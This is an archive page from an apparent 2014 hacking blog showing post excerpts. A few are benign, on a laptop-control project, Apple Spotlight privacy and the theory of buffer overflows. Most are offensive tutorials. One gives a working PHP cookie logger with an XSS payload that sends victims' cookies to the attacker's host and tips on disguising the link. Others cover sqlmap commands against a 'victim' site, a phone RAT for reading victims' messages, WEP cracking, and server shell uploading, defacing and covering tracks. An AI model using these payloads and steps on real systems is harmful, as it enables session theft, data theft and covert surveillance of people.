Posts

Showing posts from 2014

Control Your Laptop with Android, Python, Twisted, and Django

Introduction It’s always fun to put your programming skills on display. A while back, I figured it’d be cool to try to control my laptop via my Android mobile device. Think about it: being able to play and pause music, start and stop programming jobs or downloads, etc., all by sending messages from your phone. Neat, huh? Before you keep on reading, please bear in mind that this is a pet project, still in its early stages—but the basic platform is there. By gluing together some mainstream tools, I was able to set up my Android phone to control my laptop via a Python interpreter. By the way: the project is open source. You can check out the client code here, and the server code here. The Tool Belt This project involves the following technologies, some of which you may be familiar with, some of which are quite specific to the task at hand: Python 2.7+; Twisted: an excellent event-driven framework especially crafted for network hackers; Django: I used v1.4

Cookie Grabbing

Cookie Grabbing using XSS:

<?php
$cookie = $_GET['cookie'];         // store the cookie value in a variable called $cookie
$file = fopen("cookies.txt", "a"); // open a file called cookies.txt in append mode
fwrite($file, $cookie . "\n\n\n");
fclose($file);
?>

Save it as "1.php".
------------------------------------------------
Now the URL looks like: www.site.com/some_folder/1.php
-----------------------------------------------
Find a vulnerability in a site, then put it like this below:
http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>
Now send this link, but mostly people won't click it because they find this URL very suspicious. So you need to mask it
-------------------------------------
Ex: <iframe src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(esc

MAC OS X10.10

Mac OS X 10.10 Yosemite Sends User Location and Safari Search Data to Apple Apple's latest desktop operating system, known as Mac OS X 10.10 Yosemite, sends users' location and search data to Apple's remote servers by default, without their knowledge, whenever a user queries the desktop search tool Spotlight, which raises questions about users' privacy once again. The technology firm faced criticism on Monday when users came to know about the company's "About Spotlight & Privacy" notice, which clearly states that anyone who uses the Spotlight feature in either Mac OS X 10.10 Yosemite or its newly launched mobile operating system iOS 8 will have their location and search information passed back to Apple's servers for processing. APPLE COLLECTS USERS' DATA AND FORWARDS IT TO MICROSOFT AS WELL On one hand, Apple decided to enable hard-drive encryption by default, despite FBI requests not to do so. But on the other, the company is itse

How to Hack any Android, iPhone and Blackberry Mobile

Today, I'm talking about how to hack any Android, iPhone and Blackberry mobile phone. Recently, I posted how to download, install and run Backtrack 5 in Windows. It works a lot like your regular RAT. You configure an XAMPP server on your computer and once people install your app you can control them from your own phone. You can read all their messages and contacts and get shell access. Requirements: 1. Backtrack 5 R3 (using Backtrack for this example as SPF is pre-installed); I recently posted an article on how to download, install and run Backtrack 5 in Windows. 2. Port forwarding (if you are using this outside of your own network) 3. XAMPP for Linux (a guide to installing this will be in the tutorial) 4. A phone (for this example I will be using my Android phone) Step 1) Installing XAMPP: First of all, go here to get XAMPP. Once XAMPP has finished downloading, go to your home directory and you should have a file called “download.php?xampp-linux-1.7.3a.tar.gz”; rename it to

Rooting your Android

Rooting your Android #su TryNotToBreakAnything.sh We've talked a lot about root and Android in the past five years. We've discussed the good, we've discussed the bad. We'll keep talking about both, because root on Android, like Android itself, is a constantly evolving thing. As Android matures, the wide-open style of root access we may have grown used to with legacy versions has gone away. Because Android is designed for mobile devices, the focus is on security — specifically the security of your life's data you might have stored away on that screen in your pocket. We've seen Android go from the wild-west days of unfettered Superuser access, to locked down and tamper-proof (well, they try to be) devices meant for folks who need the extra level for their business details. For some of us, this is a hindrance and we don't want Google or the folks who made our phone trying to protect us from ourselves. But for each pers

Buffer overflow exploits

1. Memory Note: the way I describe memory organization here applies to most computers, but the details depend on the processor architecture. This example is for x86 and also roughly applies to SPARC. The principle of exploiting a buffer overflow is to overwrite parts of memory which aren't supposed to be overwritten by arbitrary input and make the process execute this code. To see how and where an overflow takes place, let's take a look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The process's memory consists of three sections: - code segment: data in this segment are assembler instructions that the processor executes. The code execution is non-linear; it can skip code, jump, and call functions on certain conditions. Therefore, we have a po

Metasploit

Metasploit Terms Exploit – to take advantage of a security flaw within a system, network, or application. Payload – code that the Metasploit framework makes the victim computer execute. Module – a small piece of code that can be added to the Metasploit framework to execute an attack. Shellcode – a small piece of code used as a payload. MSFconsole Msfconsole is an all-in-one interface to most of the features in Metasploit. Msfconsole can be used to launch attacks, create listeners, and much, much more. We will be using Msfconsole throughout these tutorials, and mastering it will allow you to keep up with Metasploit's rapidly changing framework. Metasploit comes installed by default on Backtrack 5. To access msfconsole, open your console and type:

root@bt:~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole

After some time, the msfconsole will boot. To view the help files, simply type help followed by the command you want to know more

Hack website using Backtrack (sqlmap)

1. Open your Backtrack terminal, type cd /pentest/database/sqlmap and hit Enter. Now sqlmap is open in your terminal.
2. Now find the vulnerable site (well, I already have a vulnerable site).
3. Now type this command in the terminal and hit Enter (refer to the figure above):
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs
4. Now you will get the database names of the website. Well, I got two databases, aj and information_schema; we will select the aj database.
5. Now get the tables of that database. For that you need to enter this command into your terminal and simply hit Enter:
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables
6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter:
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj --tables
7. Now you will get the tables list which is stored i

Blind SQL Injection

Description Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not fixed the code that is vulnerable to SQL injection. When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to extract data by asking the database a series of true or false questions. This makes exploiting the SQL injection vulnerability more difficult, but not impossible. Threat Modeling Same as for SQL Injection Risk Fa

HACK WIFI PASSWORD WITH BACKTRACK 5

Create a new virtual machine as I have done, press Enter and go on. At the boot menu, just type startx, and now you're all set to go; simply follow the steps below. Rules to Follow A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. Here is a link to download it: http://www.backtrack-linux.org/downloads I highly recommend you download the Backtrack 32-bit version because it runs smoothly in Win7 64-bit through VMware Workstation. A nearby WEP-enabled Wi-Fi network. Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient. S

How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

How to Hack a Server Everything you need to know…. Tools you need: - Backtrack (Backtrack Website) - Firefox (get it from here….) – Included in Backtrack and Ubuntu - Netcat (Included in Backtrack) — If you are on other Linux environments get it from here…. - iCon2PHP (Get it from here….) - A good shell (the iCon2PHP archive includes three great shells) - A good VPN or Tor (More explanation below…..) - Acunetix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net) About the Tools: Backtrack – Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking from a Linux system is better than from a Windows one since most websites are on Linux servers. (Just a little tip: to wirelessly connect to a network use the Wicd Network Manager, located under Applications->Internet) Firefox – Firefox is the best browser for hacking. You can easily configure a proxy